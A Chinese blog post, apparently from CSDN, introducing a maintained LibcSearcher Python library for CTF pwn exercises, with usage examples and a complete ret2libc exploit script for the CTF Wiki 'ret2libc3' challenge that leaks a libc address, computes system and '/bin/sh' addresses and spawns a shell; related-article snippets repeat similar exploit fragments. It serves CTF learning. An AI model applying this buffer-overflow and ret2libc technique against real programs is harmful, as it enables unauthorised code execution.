2021年能用的LibcSearcher

最新推荐文章于 2024-05-18 10:05:49 发布
最新推荐文章于 2024-05-18 10:05:49 发布
阅读量4.2k 收藏 3
点赞数 3
分类专栏: pwn 文章标签: harmonyos 物联网 elasticsearch
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/kelxLZ/article/details/121571868
版权
本文介绍了如何使用更新版的LibcSearcher库进行漏洞利用,特别是在CTF挑战中解决Ret2Libc3问题。通过示例展示了如何初始化搜索器,添加约束条件,以及如何确定和使用Libc的特定地址来获取shell。此外,还添加了新功能如查询可能的Libc数量、打印详细信息和迭代遍历所有可能的Libcs。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  • Author:ZERO-A-ONE
  • Date:2021-11-27

这里介绍一个全新的 LibcSearcher 实现。基于 libc-database云端数据库而非本地数据库。原版 LibcSearcher 仓库由于年久失修,经测试发现其基本失效

项目地址如下:https://github.com/dev2ero/LibcSearcher

安装:

pip3 install LibcSearcher

使用方法:

from LibcSearcher import *
obj = LibcSearcher("fgets", 0x7ff39014bd90) # 使用一个已知符号地址作为初始约束,初始化 LibcSearcher
obj.add_condition("atoi", 218528) # 添加一个约束条件
obj.dump("printf") # 根据已有约束条件,查询某个符号在 Libc 中的地址

此外,比起以上原版接口,添加了如下些许姿势

len(obj) # 返回在当前约束条件下,可能的 Libc 数量

print(obj) # 若 Libc 已被唯一确定,打印其详细信息

for libc in obj :
    print(libc) # 实现了迭代器,打印(或其它操作)当前所有可能的 Libc 

obj.select_libc() # 打印可能的 Libc 列表,手动选择一个认为正确的 Libc
obj.select_libc(2) # 手动选择 2 号 Libc 作为正确的 Libc

具体举例使用的话以CTF Wiki里的Ret2Libc3为例,EXP改写为

#!/usr/bin/env python
from pwn import *
from LibcSearcher import *
sh = process('./ret2libc3')

ret2libc3 = ELF('./ret2libc3')

puts_plt = ret2libc3.plt['puts']
libc_start_main_got = ret2libc3.got['__libc_start_main']
main = ret2libc3.symbols['main']

print ("leak libc_start_main_got addr and return to main again")
payload = flat([b'A' * 112, puts_plt, main, libc_start_main_got])
sh.sendlineafter('Can you find it !?', payload)

print ("get the related addr")
libc_start_main_addr = u32(sh.recv()[0:4])
libc = LibcSearcher("__libc_start_main", libc_start_main_addr)
#libc = LibcSearcher('__libc_start_main', libc_start_main_addr)
libcbase = libc_start_main_addr - libc.dump('__libc_start_main')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
print ("get shell")
payload = flat([b'A' * 104, system_addr, 0xdeadbeef, binsh_addr])
sh.sendline(payload)
sh.interactive()
LibcSearcher--匹配libc版本的神器
Assassin
04-06 9960
文章目录**一、简介****二、安装****版本一:本地判断libc的方法****版本二:在线使用webAPI的方式****三、关于本地libc文件的更新问题****四、使用方法** 一、简介 LibcSearcher是python的一个库,用于解决pwn中不明libc版本的情况,可以根据泄露的某函数地址,推测服务端使用的libc版本,是做题必备的神器。 根据网上的版本,我总结两个可以利用的方法 二、安装 版本一:本地判断libc的方法 使用原作者的版本即可,安装指令如下 git clone https
LibcSearcher的使用
Sakura给爷pwn全场
12-03 1543
BUUCTF ciscn_2019_c_1 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvline() sla=lambda x,y:io.sendlineafter(x,y) io=remote('xxx',xxx) elf=ELF('
LibcSearcher
01-18
github上的LibSearcher经常下载失败,手动上传一个
LibcSearcher.zip
06-09
项目地址:https://github.com/lieanu/LibcSearcher,因为依赖于庞大的https://github.com/lieanu/libc-database,大概有490M左右
pwn学习--LibcSearcher
热门推荐
gclome的博客
04-11 1万+
以上一篇ret2libc绕过地址随机化的代码为例,一般在我们做题的时候没法查看 libc 的版本之类的,连上服务器后就是程序运行起来的情况,那这时候就需要新的知识来解决了 LibcSearcher,可以通过它来找出偏移,此时依旧开启ASLR LibcSearcher安装: git clone https://github.com/lieanu/LibcSearcher.git cd LibcSea...
libcsearcher
最新发布
03-22
好的,用户想寻找与libcsearcher相关的技术资料或工具。首先,我需要确认libcsearcher是什么,可能是一个库或者工具。 先搜索一下libcsearcher。看起来它可能和代码搜索、静态分析相关。可能和C/C++开发有关?用户...
探索LibcSearcher:C语言库搜索利器
gitblog_00057的博客
04-02 588
探索LibcSearcher:C语言库搜索利器 去发现同类优质开源项目:https://gitcode.com/ 是一个强大的开源工具,专为C语言开发者设计,用于快速、准确地查找和比较各种libc库中的函数实现。它旨在简化调试过程,提高开发效率,让开发者能够更深入地理解和利用标准库。 技术分析 LibcSearcher 使用现代软件工程原则构建,采用Python编程语言编写。其核心功能是通过爬取互...
LibcSearcher报错:no matched libc,please add more libc or try others
qq_40889704的博客
05-09 3908
今天在CTF-wiki上学习缓冲区溢出攻击中的ret2libc 在编写攻击代码时,用到了一个名为LibcSearcher的库,来确定libc中某个函数的地址。 这里先给出库的链接:https://github.com/lieanu/LibcSearcher 但是按照wiki上给出的例子编写好攻击代码,在运行时报错了: no matched libc,please add more libc or try others 大概意思是找不到匹配的libc版本库。 进到LibcSearcher的libc-data
[二进制学习笔记]LibcSearcher安装
hide_in_darkness的博客
08-08 2208
​ 这是针对CTF比赛所做的小工具,在泄露了Libc中的某一个函数地址后,常常为不知道对方所使用的操作系统及libc的版本而苦恼,常规方法就是挨个把常见的Libc.so从系统里拿出来,与泄露的地址对比一下最后12位。​ 详细的安装过程其实github上就有,我在这里炒个冷饭(工具地址:https://github.com/lieanu/LibcSearcher)......
探索LibcSearcher:二进制安全分析利器
gitblog_00033的博客
04-02 634
探索LibcSearcher:二进制安全分析利器 去发现同类优质开源项目:https://gitcode.com/ 在软件开发和安全领域,理解库函数的行为至关重要,尤其是C语言中的libc。是一个创新的开源工具,专门设计用于快速搜索和分析各种libc版本的功能实现。这篇文章将带你深入了解该项目的背景、技术细节、应用场景以及其独特优势。 项目简介 LibcSearcher是一款强大的命令行工具,它可...
pwn篇:攻防世界进阶welpwn,LibcSearcher使用
weixin_44644249的博客
02-10 1008
攻防世界welpwn 这题主要是考无Libc泄露地址,在没有Libc的情况下,可以使用LibcSearcher进行动态匹配,匹配完成后会给出选项,选择libc的版本即可。如果不知道版本可以一个个试。 安装LibcSearcher git clone https://github.com/lieanu/LibcSearcher.git 文件有点大,100多Mb 配置LibcSearcher,可以直接install,会自动build cd LibcSearcher python setup.py instal
探索Libc函数偏移:LibcSearcher - 资深技术主编推荐
gitblog_00023的博客
05-18 837
探索Libc函数偏移:LibcSearcher - 资深技术主编推荐 去发现同类优质开源项目:https://gitcode.com/ 在网络安全领域,尤其是参加CTF(Capture The Flag)比赛时,了解和利用Libc函数的地址是关键技能之一。当你手握一个Libc中特定函数的地址,但不清楚它是哪个操作系统或是哪个版本的Libc,怎么办?这时,LibcSearcher就成为了你的得力助手...
LibcSearcher找不到合适的libc(更新到python3版本Libc)
MDong1344的博客
09-13 3002
LibcSearcher找不到合适的libc(更新到python3版本Libc) 如果你是用的基于python2的LibcSearcher,可以安装python3版本的libcsearcher https://pypi.org/project/LibcSearcher/ pip3 install LibcSearcher 更新之后用python3执行exp就可以了! 不过这个库要联网使用~ … 最近在看pwn, 看到ret2libc,ret2csu的时候好几个题我的libcsearcher一次也
LibcSearcher的安装使用
qq_40026795的博客
06-26 1万+
LibcSearcher是针对pwn做的python库,在做pwn题时寻找libc版本非常好用,使用方式也非常简单: fromLibcSearcherimport* #第二个参数,为已泄露的实际地址,或最后12位(比如:d90),int类型 obj=LibcSearcher("fgets",0X7ff39014bd90) 可以安装也可以直接将LibcSearcher.py拿到...
准确识别ELF文件使用的libc.so版本,LibcSearcher 工具的使用
ifthengg的博客
10-20 1899
准确到小数点100位,识别ELF文件使用的libc.so版本,LibcSearcher 工具的使用
LibcSearcher添加kali自带libc
菜的只能随便写写博客
02-18 1974
LibcSearcher是一个pwn中比较好用的libc版本搜寻,并且带有libc-database,使用kali或者其他linux调试的时候,需要使用本机的libc文件,下面说一说怎么查找本机的libc和添加libc。 查看本机使用libc 以上分别是64位和32位的libc文件所在。 添加libc 找到LibcSearcher所在路径的libc-database文件夹下面,具体使用方法参...
解决LibcSearcher找不到合适libc(更新libc)
yongbaoii的博客
02-09 6607
1 尝试直接更新 进入LibcSearcher/libc-database中运行./get文件即可进行更新。 可能./get更新不了。 2 究极更新 cd LibcSearcher rm -rf libc-database git clone https://github.com/niklasb/libc-database.git 然后进入libc-database执行./get 可能会这样提醒。 那么就看需要点啥更新点啥,一般是 ./get ubuntu #一般pwn题环境就Ubuntu,所以有第一个
Libcsearcher环境配置
N1rvana的博客
11-15 2038
libcsearcher libc库的更新安装 之前用libcsearcher基本上都显示no match libc。一直感觉很纳闷,后来请教了大佬之后才发现是libc库都没有安装。(如果小伙伴们也遇见这种问题,重新去安装一下libc库吧) 先更新ubuntu的软件 sudo apt-get update “无法安全地用该源进行更新,所以默认禁用该源” 这是我之前一直遇到的问题,但是拖到现在还没解决。解决方法:换清华的源。(默认为国外的源,太慢,不稳定) 先将原来的配置文件备份:其中的sources.li
libcsearcher安装
07-27
要安装LibcSearcher,您可以按照以下步骤进行操作: 1. 首先,您需要手动安装LibcSearcher。您可以使用以下命令将其克隆到您的本地目录: ``` sudo git clone https://github.com/lexsd6/LibcSearcher_plus.git ``` 2. 进入LibcSearcher_plus目录: ``` cd ./LibcSearcher_plus ``` 3. 授予setup.py文件执行权限: ``` sudo chmod 777 ./setup.py ``` 4. 如果您已经安装了libc-database,可以将其复制到LibcSearcher_plus目录下。如果没有安装,请执行以下命令克隆libc-database: ``` sudo git clone https://github.com/niklasb/libc-database.git ``` 5. 安装ruby环境(如果您已经安装了ruby环境,可以跳过此步骤): ``` sudo apt-get install ruby2.6 ruby2.6-dev ``` 6. 安装one_gadget工具: ``` sudo gem install one_gadget ``` 7. 执行setup.py文件进行安装: ``` sudo ./setup.py develop ``` 8. 如果您已经安装了libc-database,可以跳过此步骤。否则,进入libc-database目录并获取适用于Ubuntu和Debian系统的libc数据库: ``` cd ./libc-database sudo ./get ubuntu debian ``` 这样,您就成功安装了LibcSearcher。请注意,这是一个针对CTF比赛开发的小工具,用于在泄露了Libc中的某个函数地址后,根据地址的最后12位与常见的Libc.so进行对比。\[1\]\[2\] #### 引用[.reference_title] - *1* [LibcSearcher安装的心路历程和坑____Python2,setuptools,libcsearcher其他版本](https://blog.youkuaiyun.com/OrientalGlass/article/details/128541226)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[二进制学习笔记]LibcSearcher安装](https://blog.youkuaiyun.com/hide_in_darkness/article/details/126224698)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值